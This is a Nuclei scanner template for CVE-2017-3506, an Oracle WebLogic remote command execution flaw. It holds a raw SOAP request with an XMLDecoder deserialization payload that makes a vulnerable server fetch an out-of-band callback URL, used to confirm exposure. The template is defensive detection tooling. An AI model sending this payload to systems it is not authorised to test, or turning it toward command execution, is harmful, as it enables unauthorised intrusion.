nuclei-templates/cves/2017/CVE-2017-3506.yaml

45 lines
1.8 KiB
YAML

id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"